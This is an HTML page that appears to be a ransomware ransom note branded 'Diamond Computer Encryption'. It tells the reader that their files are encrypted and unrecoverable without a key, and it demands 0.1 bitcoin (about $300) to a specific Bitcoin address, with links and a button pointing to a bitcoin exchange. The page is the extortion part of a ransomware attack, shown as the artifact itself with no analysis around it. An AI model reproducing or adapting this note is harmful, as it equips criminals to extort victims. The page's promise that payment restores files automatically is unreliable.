<html xmlns="http://www.w3.org/1999/xhtml" xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office"><head>
    <!--[if gte mso 9]><xml>
     <o:OfficeDocumentSettings>
      <o:AllowPNG/>
      <o:PixelsPerInch>96</o:PixelsPerInch>
     </o:OfficeDocumentSettings>
    </xml><![endif]-->
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width" />
    <!--[if !mso]><!--><meta http-equiv="X-UA-Compatible" content="IE=edge" /><!--<![endif]-->
    <title>Diamond Encryption</title>
    <!--[if !mso]><!-- -->
	<!--<![endif]-->
    
    </head>
	


	
<body class="clean-body" style="margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #CCC;line-height: inherit">
<p>Translate this page:</p>

	<script type="text/javascript">
function googleTranslateElementInit() {
new google.translate.TranslateElement({pageLanguage: 'en'}, 'google_translate_element');
}
</script>
<div id="google_translate_element"></div>
<script type="text/javascript" src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>

  <!--[if IE]><div class="ie-browser"><![endif]-->
  <!--[if mso]><div class="mso-container"><![endif]-->
  <div class="nl-container" style="min-width: 320px;margin: 0 auto;background-color: #CCC;line-height: inherit">
    <!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td align="center" style="background-color: #CCCCCC;"><![endif]-->

    <div style="background-color: #106CC8;line-height: inherit">
      <div style="margin: 0 auto;min-width: 320px;max-width: 705px;width: calc(39500% - 285670px);overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;line-height: inherit" class="block-grid ">
        <div style="border-collapse: collapse;display: table;width: 100%;line-height: inherit">
          <!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="background-color:#106CC8;" align="center"><table cellpadding="0" cellspacing="0" border="0" style="width: 705px;"><tr class="layout-full-width" style="background-color:transparent;"><![endif]-->

              <!--[if (mso)|(IE)]><td align="center" width="705" style=" width:705px; padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;" valign="top"><![endif]-->
            <div class="col num12" style="min-width: 320px;max-width: 705px;width: calc(38500% - 270720px);background-color: transparent;line-height: inherit">
              <div style="background-color: transparent;width: 100% !important;line-height: inherit">
              <!--[if (!mso)&(!IE)]><!--><div style="border-top: 0 solid transparent;border-left: 0 solid transparent;border-bottom: 0 solid transparent;border-right: 0 solid transparent;padding-top: 5px;padding-bottom: 5px;padding-right: 0;padding-left: 0;line-height: inherit"><!--<![endif]-->

                  
                    <div align="center" class="img-container center fullwidth" style="padding-right: 0;padding-left: 0;line-height: inherit">
<!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 0px; padding-left: 0px;" align="center"><![endif]-->
  <a href="http://localbitcoin.com" target="_blank" style="line-height: inherit">
    <img class="center fullwidth" align="center" border="0" src="http://www.tiffany.com/shared/images/engagement/flawless-diamond.png" alt="Image" title="Image" style="outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;width: 100%;max-width: 705px;line-height: inherit" width="705" />
  </a>
<!--[if mso]></td></tr></table><![endif]-->
</div>

                  
                  
                    <!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 10px; padding-left: 10px; padding-top: 10px; padding-bottom: 25px;"><![endif]-->
<div style="font-family: &quot;Droid Serif&quot;, Georgia, Times, &quot;Times New Roman&quot;, serif;color: #FFF;line-height: 120%;padding-right: 10px;padding-left: 10px;padding-top: 10px;padding-bottom: 25px">	
	<div style="font-size: 12px;line-height: 14px;color: #FFF;font-family: &quot;Droid Serif&quot;, Georgia, Times, &quot;Times New Roman&quot;, serif;text-align: left"><p style="margin: 0;font-size: 12px;line-height: 14px;text-align: center"><span style="font-size: 36px;line-height: 43px"><em style="line-height: inherit"><span style="line-height: 43px;font-size: 36px">Diamond  Computer Encryption </span></em></span><br style="line-height: inherit" /></p></div>	
</div>
<!--[if mso]></td></tr></table><![endif]-->

                  
              <!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
              </div>
            </div>
          <!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
        </div>
      </div>
    </div>    <div style="background-color: #FFF;line-height: inherit">
      <div style="margin: 0 auto;min-width: 320px;max-width: 705px;width: calc(39500% - 285670px);overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;line-height: inherit" class="block-grid ">
        <div style="border-collapse: collapse;display: table;width: 100%;line-height: inherit">
          <!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="background-color:#FFFFFF;" align="center"><table cellpadding="0" cellspacing="0" border="0" style="width: 705px;"><tr class="layout-full-width" style="background-color:transparent;"><![endif]-->

              <!--[if (mso)|(IE)]><td align="center" width="705" style="background-color:#FFFFFF; width:705px; padding-right: 0px; padding-left: 0px; padding-top:0px; padding-bottom:0px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;" valign="top"><![endif]-->
            <div class="col num12" style="min-width: 320px;max-width: 705px;width: calc(38500% - 270720px);background-color: transparent;line-height: inherit">
              <div style="background-color: #FFF;width: 100% !important;line-height: inherit">
              <!--[if (!mso)&(!IE)]><!--><div style="border-top: 0 solid transparent;border-left: 0 solid transparent;border-bottom: 0 solid transparent;border-right: 0 solid transparent;padding-top: 0;padding-bottom: 0;padding-right: 0;padding-left: 0;line-height: inherit"><!--<![endif]-->

                  
                    <div style="padding-right: 5px;padding-left: 5px;padding-top: 5px;padding-bottom: 5px;line-height: inherit">
  <!--[if (mso)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 5px;padding-left: 5px; padding-top: 5px; padding-bottom: 5px;"><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0"><tr><td><![endif]-->
  <div align="center" style="line-height: inherit"><div style="border-top: 0 solid transparent;width: 100%;line-height: 0;height: 0;font-size: 0"> </div></div>
  <!--[if (mso)]></td></tr></table></td></tr></table><![endif]-->
</div>

                  
                  
                    <!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 30px; padding-left: 30px; padding-top: 20px; padding-bottom: 15px;"><![endif]-->
<div style="font-family: &quot;Droid Serif&quot;, Georgia, Times, &quot;Times New Roman&quot;, serif;color: #7E7E7E;line-height: 150%;padding-right: 30px;padding-left: 30px;padding-top: 20px;padding-bottom: 15px">	
	<div style="font-size: 12px;line-height: 18px;color: #7E7E7E;font-family: &quot;Droid Serif&quot;, Georgia, Times, &quot;Times New Roman&quot;, serif;text-align: left"><p style="margin: 0;font-size: 14px;line-height: 21px;text-align: center"><span style="font-size: 24px;line-height: 36px"><strong style="line-height: inherit"><span style="line-height: 36px;font-size: 24px">What Happened to My Computer?</span></strong></span></p><p style="margin: 0;font-size: 14px;line-height: 21px;text-align: center"> <br style="line-height: inherit" /></p><p style="margin: 0;font-size: 14px;line-height: 21px;text-align: center">Your important files are encrypted.<br style="line-height: inherit" />
	  Many of your documents, photos, videos, databases and other files are no longer accessible because they have been encrypted. Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without the decryption key.<br style="line-height: inherit" /></p><p style="margin: 0;font-size: 14px;line-height: 21px;text-align: center"> <br style="line-height: inherit" /></p><p style="margin: 0;font-size: 14px;line-height: 21px;text-align: center"><span style="font-size: 24px;line-height: 36px"><strong style="line-height: inherit">Can I recover my files?</strong></span></p><p style="margin: 0;font-size: 14px;line-height: 21px;text-align: center"> <br style="line-height: inherit" /></p>
	  <p style="margin: 0;font-size: 14px;line-height: 21px;text-align: center"><span style="font-size: 14px;line-height: 21px">Sure. We guarantee that you can recover all your files safely and easily you only need is pay 0.1 bitcoins</span> (Approximate value in dollars U$$ 300)</p><p style="margin: 0;font-size: 14px;line-height: 21px;text-align: center"> <br style="line-height: inherit" /></p><p style="margin: 0;font-size: 14px;line-height: 21px;text-align: center"><span style="font-size: 24px;line-height: 36px"><strong style="line-height: inherit"><span style="line-height: 36px;font-size: 24px">How do I Pay?</span></strong></span></p><p style="margin: 0;font-size: 14px;line-height: 21px;text-align: center"> <br style="line-height: inherit" /></p><p style="margin: 0;line-height: 21px;font-size: 14px;text-align: center"><span style="font-size: 14px;line-height: 21px"><span style="line-height: 21px;font-size: 14px">Payment is accepted in Bitcoin only. <br style="line-height: inherit" />You buy bitcoins in <a style="color: #8F8F8F;text-decoration: underline;line-height: inherit" href="http://localbitcoin.com" target="_blank" rel="noopener noreferrer">http://localbitcoin.com</a> or put on google search on your country buy bitcoin and you verify the locations for buy Bitcoins in your location.<br style="line-height: inherit" />After the payment confirmed all your files is decrypted automatically and you recover all your files are encrypted now. The address for make the payment is 1L6PpSehR8V7YsZTc3L3F5RwbWoNma1nno</span></span></p><p style="margin: 0;font-size: 14px;line-height: 21px;text-align: center"> <br style="line-height: inherit" /></p>
	  <p style="margin: 0;font-size: 14px;line-height: 21px;text-align: center"><span style="font-size: 24px;line-height: 36px"><strong style="line-height: inherit"><span style="line-height: 36px;font-size: 24px"><span style="line-height: 36px;font-size: 24px">For automatic recover all your files send 0.1 bitcoin to 1L6PpSehR8V7YsZTc3L3F5RwbWoNma1nno</span></span></strong></span></p></div>	
</div>
<!--[if mso]></td></tr></table><![endif]-->

                  
              <!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
              </div>
            </div>
          <!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
        </div>
      </div>
    </div>    <div style="background-color: transparent;line-height: inherit">
      <div style="margin: 0 auto;min-width: 320px;max-width: 705px;width: calc(39500% - 285670px);overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;line-height: inherit" class="block-grid ">
        <div style="border-collapse: collapse;display: table;width: 100%;line-height: inherit">
          <!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="background-color:transparent;" align="center"><table cellpadding="0" cellspacing="0" border="0" style="width: 705px;"><tr class="layout-full-width" style="background-color:transparent;"><![endif]-->

              <!--[if (mso)|(IE)]><td align="center" width="705" style=" width:705px; padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;" valign="top"><![endif]-->
            <div class="col num12" style="min-width: 320px;max-width: 705px;width: calc(38500% - 270720px);background-color: transparent;line-height: inherit">
              <div style="background-color: transparent;width: 100% !important;line-height: inherit">
              <!--[if (!mso)&(!IE)]><!--><div style="border-top: 0 solid transparent;border-left: 0 solid transparent;border-bottom: 0 solid transparent;border-right: 0 solid transparent;padding-top: 5px;padding-bottom: 5px;padding-right: 0;padding-left: 0;line-height: inherit"><!--<![endif]-->

                  
                    
<div align="center" class="button-container center" style="padding-right: 5px;padding-left: 5px;padding-top: 5px;padding-bottom: 5px;line-height: inherit">
  <!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0" style="border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;"><tr><td style="padding-right: 5px; padding-left: 5px; padding-top:5px; padding-bottom:5px;" align="center"><v:roundrect xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="urn:schemas-microsoft-com:office:word" href="http://localbitcoin.com" style="height:42px; v-text-anchor:middle; width:381px;" arcsize="58%" strokecolor="#106CC8" fillcolor="#106CC8"><w:anchorlock/><center style="color:#ffffff; font-family:'Droid Serif', Georgia, Times, 'Times New Roman', serif; font-size:16px;"><![endif]-->
    <a href="http://localbitcoin.com" target="_blank" style="display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #fff;background-color: #106CC8;border-radius: 24px;-webkit-border-radius: 24px;-moz-border-radius: 24px;max-width: 361px;width: auto;border-top: 0 solid transparent;border-right: 0 solid transparent;border-bottom: 0 solid transparent;border-left: 0 solid transparent;padding-top: 5px;padding-right: 25px;padding-bottom: 5px;padding-left: 25px;font-family: &quot;Droid Serif&quot;, Georgia, Times, &quot;Times New Roman&quot;, serif;mso-border-alt: none;line-height: inherit">
      <span style="font-size: 16px;line-height: 32px"><span style="font-size: 14px;line-height: 28px" data-mce-style="font-size: 14px;">GO LOCALBITCOIN.COM FOR BUY BITCOINS</span></span>
    </a>
  <!--[if mso]></center></v:roundrect></td></tr></table><![endif]-->
</div>

                  
              <!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
              </div>
            </div>
          <!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
        </div>
      </div>
    </div>   <!--[if (mso)|(IE)]></td></tr></table><![endif]-->
  </div>
  <!--[if (mso)|(IE)]></div><![endif]-->


</body></html>
